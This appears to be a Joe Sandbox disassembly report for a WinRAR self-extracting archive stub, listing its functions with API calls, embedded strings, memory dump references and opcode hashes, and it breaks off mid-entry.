Instruction Fuzzy Hash: A4E04631040188ABCF016F20CD09B6E3FAEEB10341F1144D5FA198B132CF36DE56CA80

Function 00BD848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD8493

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 366a6af435ed4170294c8ce2ea0f3b46b3ff73857631a802f914af9c6c6752ab
Instruction ID: ba5167b95f46cae4fa3fbc2b8a07417cf8122e20e0fa51f398e941dec8200413
Opcode Fuzzy Hash: 366a6af435ed4170294c8ce2ea0f3b46b3ff73857631a802f914af9c6c6752ab
Instruction Fuzzy Hash: 8282C770904285AEDF15DB64C895BFAFBE9EF15301F0845FBD8499B382EB315A84CB60

Function 00BEB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BEB7E5

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB8EF
IsDialogMessageW.USER32(?,?), ref: 00BEB902
TranslateMessage.USER32(?), ref: 00BEB910
DispatchMessageW.USER32(?), ref: 00BEB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BEB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00BEB960
GetDlgItem.USER32(?,00000068), ref: 00BEB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BEB99E
SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BEB9B1

Part of subcall function 00BED453: _wcslen.LIBCMT ref: 00BED47D

SetFocus.USER32(00000000), ref: 00BEB9B8
_swprintf.LIBCMT ref: 00BEBA24

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

Part of subcall function 00BED4D4: GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
Part of subcall function 00BED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BEBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BEBA90
GetTickCount.KERNEL32 ref: 00BEBAAE
_swprintf.LIBCMT ref: 00BEBAC2
GetLastError.KERNEL32(?,00000011), ref: 00BEBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BEBB43
_swprintf.LIBCMT ref: 00BEBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BEBBD0
GetCommandLineW.KERNEL32 ref: 00BEBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BEBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00BEBC6F
Sleep.KERNEL32(00000064), ref: 00BEBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BEBCE2
CloseHandle.KERNEL32(00000000), ref: 00BEBCEB
_swprintf.LIBCMT ref: 00BEBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBD7D
SetDlgItemTextW.USER32(?,00000065,00C035F4), ref: 00BEBD94
GetDlgItem.USER32(?,00000065), ref: 00BEBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00BEBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BEBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBE68
_wcslen.LIBCMT ref: 00BEBEBE
_swprintf.LIBCMT ref: 00BEBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BEBF4C
GetDlgItem.USER32(?,00000068), ref: 00BEBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BEBF6B
GetDlgItem.USER32(?,00000066), ref: 00BEBF85
SetWindowTextW.USER32(00000000,00C1A472), ref: 00BEBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BEC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BEC0BD
EnableWindow.USER32(00000000,00000000), ref: 00BEC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BEC1D9

Part of subcall function 00BEC73F: __EH_prolog.LIBCMT ref: 00BEC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC1FD

Strings

winrarsfxmappingfile.tmp, xrefs: 00BEBBA6
"%s"%s, xrefs: 00BEBD0D
%s, xrefs: 00BEBED8
STARTDLG, xrefs: 00BEB801
<, xrefs: 00BEBB84
C:\Users\user\Desktop, xrefs: 00BEBBC9
@, xrefs: 00BEBB91
LICENSEDLG, xrefs: 00BEC0B2
-el -s2 "-d%s" "-sp%s", xrefs: 00BEBB6B
__tmp_rar_sfx_access_check_%u, xrefs: 00BEBAB5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2608530638
Opcode ID: 66a5a0884866cdb1eb81c59fb33a471bd9cea567cb0154f973ec06b362e54e7d
Instruction ID: fb4395f135fafe31711fe0eb76ef56382478e1447b027a98b5f2ac56763d92b9
Opcode Fuzzy Hash: 66a5a0884866cdb1eb81c59fb33a471bd9cea567cb0154f973ec06b362e54e7d
Instruction Fuzzy Hash: 3B42D5719442C8BAEB21AB719C4AFBF7BFCEB02700F0440E5F645A61D2DB749A45CB61

Function 00BE0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00C03C7C,00000000), ref: 00BE0BB1
CloseHandle.KERNEL32(00000000), ref: 00BE0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C03C7C,?,00000000,?,00000800), ref: 00BE0C72
GetFileAttributesW.KERNELBASE(?,?,00C03C7C,00000800,?,00000000,?,00000800), ref: 00BE0C9C
GetFileAttributesW.KERNEL32(?,?,00C03D44,00000800), ref: 00BE0CD8

Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858

_swprintf.LIBCMT ref: 00BE0D4A
_swprintf.LIBCMT ref: 00BE0D96

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

AllocConsole.KERNEL32 ref: 00BE0D9E
GetCurrentProcessId.KERNEL32 ref: 00BE0DA8
AttachConsole.KERNEL32(00000000), ref: 00BE0DAF
_wcslen.LIBCMT ref: 00BE0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BE0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00BE0DDC
Sleep.KERNEL32(00002710), ref: 00BE0DE7
FreeConsole.KERNEL32 ref: 00BE0DED
ExitProcess.KERNEL32 ref: 00BE0DF5

Strings

uxtheme.dll, xrefs: 00BE0D17
SetDefaultDllDirectories, xrefs: 00BE08B9
dwmapi.dll, xrefs: 00BE0927, 00BE0D0D
SetDllDirectoryW, xrefs: 00BE0888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00BE0D84
kernel32, xrefs: 00BE0873
DXGIDebug.dll, xrefs: 00BE08FC, 00BE0C5E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
Instruction ID: 1d5f78f2747c2e387c1179b0a75dff905fc23683cb8226a9b5ad775a0dee9664
Opcode Fuzzy Hash: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
Instruction Fuzzy Hash: 92D172F10183C5ABDB20AF51C849B9FBBECFF85708F51495DF28596290DBB08649CB62

Function 00BEC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00BEC744

Part of subcall function 00BEB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BEB3FB

_wcslen.LIBCMT ref: 00BECA0A
_wcslen.LIBCMT ref: 00BECA13
SetWindowTextW.USER32(?,?), ref: 00BECA71
_wcslen.LIBCMT ref: 00BECAB3
_wcsrchr.LIBVCRUNTIME ref: 00BECBFB
GetDlgItem.USER32(?,00000066), ref: 00BECC36
SetWindowTextW.USER32(00000000,?), ref: 00BECC46
SendMessageW.USER32(00000000,00000143,00000000,00C1A472), ref: 00BECC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BECC7F

Strings

ProgramFilesDir, xrefs: 00BECB45
<br>, xrefs: 00BEC9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 00BECB1A
%s.%d.tmp, xrefs: 00BEC940

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
Instruction ID: ebd33379e16556758be2bc9d2da865a63cef0e688158b60b60f6514b919fb976
Opcode Fuzzy Hash: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
Instruction Fuzzy Hash: 53E14172900298AADB25EBA5DD85EEE77FCEF04350F1040E6F609E7150EB749E858B60

Function 00BDDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BDDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BDDAAC

Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2

Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0

Part of subcall function 00BE1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BDBAE9,00000000,?,?,?,000103FE), ref: 00BE1BA0

_wcslen.LIBCMT ref: 00BDDDE9
__fprintf_l.LIBCMT ref: 00BDDF1C

Strings

$%s:, xrefs: 00BDDEFF
,, xrefs: 00BDDF57
, xrefs: 00BDDD6C
@%s:, xrefs: 00BDDF06, 00BDDF12
*messages***, xrefs: 00BDDBFA
R, xrefs: 00BDDC0C
RTL, xrefs: 00BDDEDE
*messages***, xrefs: 00BDDBC1
a, xrefs: 00BDDC16

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 1b2b269697bfb9339a3b31ae8914856102602d6e3f09a201c832c5f05d5abaac
Instruction ID: 17cfb066a2e777f623bf92b449d390818e1a54b3e22eaebe60b5e47440779c59
Opcode Fuzzy Hash: 1b2b269697bfb9339a3b31ae8914856102602d6e3f09a201c832c5f05d5abaac
Instruction Fuzzy Hash: DB32C171A00219ABCF24EF68C842BE9B7E5EF14700F4045ABFA55AB391F7B1D985CB50

Function 00BED4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
Part of subcall function 00BEB568: IsDialogMessageW.USER32(000103FE,?), ref: 00BEB59E
Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6

GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0

Strings

\, xrefs: 00BED549

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 4e5341a45a41843bde7269ce8d5e8516bb220f16c299b54608d5e50fb6a4b901
Instruction ID: 4db6b7eb70e2ff2230cb6ca0b94ef4b34d276482d03387f6ab9d44dc29100f65
Opcode Fuzzy Hash: 4e5341a45a41843bde7269ce8d5e8516bb220f16c299b54608d5e50fb6a4b901
Instruction Fuzzy Hash: 8C31BF71245382AFE301DF20DC4AFAF7FACEB96704F000518FA51961E0DB659A09CBB6

Function 00BED78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00BED7AE
ShellExecuteExW.SHELL32(?), ref: 00BED8DE
ShowWindow.USER32(?,00000000), ref: 00BED91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00BED959
CloseHandle.KERNEL32(?), ref: 00BED97F
ShowWindow.USER32(?,00000001), ref: 00BED9E1

Strings

.inf, xrefs: 00BED89A
.exe, xrefs: 00BED989

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
Instruction ID: 067606b1dfc72e9f85e6300e8dcc4b0dc6bbadf3a28d94c20395484ba8cec279
Opcode Fuzzy Hash: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
Instruction Fuzzy Hash: E451C1751043C09AEB309F269C44BAFBBE4EF42744F04089EF9C5971A2E7F58985CB52

Function 00BFA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BF5695,00BF5695,?,?,?,00BFABAC,00000001,00000001,2DE85006), ref: 00BFA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BFABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BFAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BFAB35
__freea.LIBCMT ref: 00BFAB42

Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38

__freea.LIBCMT ref: 00BFAB4B
__freea.LIBCMT ref: 00BFAB70

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: ed488250c85c1d0177e8903e2543c3f606c1669084fdb2e377427e53e1a7af6a
Instruction ID: 189ba67208b8e37cc4bf5221b78c7aae69d8c165a0ac12a44dbb0d5aeca68753
Opcode Fuzzy Hash: ed488250c85c1d0177e8903e2543c3f606c1669084fdb2e377427e53e1a7af6a
Instruction Fuzzy Hash: FE51B4B261021AAFDB298F64CC81EBFB7EAEB44750F1546A9FE08D7141DB34DC48C691

Function 00BF3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00BF3C35,?,?,00C32088,00000000,?,00BF3D60,00000004,InitializeCriticalSectionEx,00C06394,InitializeCriticalSectionEx,00000000), ref: 00BF3C03

Strings

api-ms-, xrefs: 00BF3BC3

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: f16918a4ee016a0d492bc89d4706fa0731adf93868a497e9e0f7d99ac1256247
Instruction ID: a05f80f08a7941d8e139bbc5bfa8d1c5cafaf2d4a5c85145b95c1781b8ce9fc3
Opcode Fuzzy Hash: f16918a4ee016a0d492bc89d4706fa0731adf93868a497e9e0f7d99ac1256247
Instruction Fuzzy Hash: 0611CA31A45629ABCB218B689C51B6D37E4DF01B70F250190FA15FB291D771EF48C6D1

Function 00BD98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BD7760,?,00000005,?,00000011), ref: 00BD995F
GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BD7760,?,00000005,?), ref: 00BD99A2
GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99F9

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 8f79f0c46fae011e5170a5dd0c0a017d770449af48806226c8bb90799d7ed214
Instruction ID: 44c5a5975cdebf4775225905c1f973708328c0757e2585ea16a71f6329b4a30b
Opcode Fuzzy Hash: 8f79f0c46fae011e5170a5dd0c0a017d770449af48806226c8bb90799d7ed214
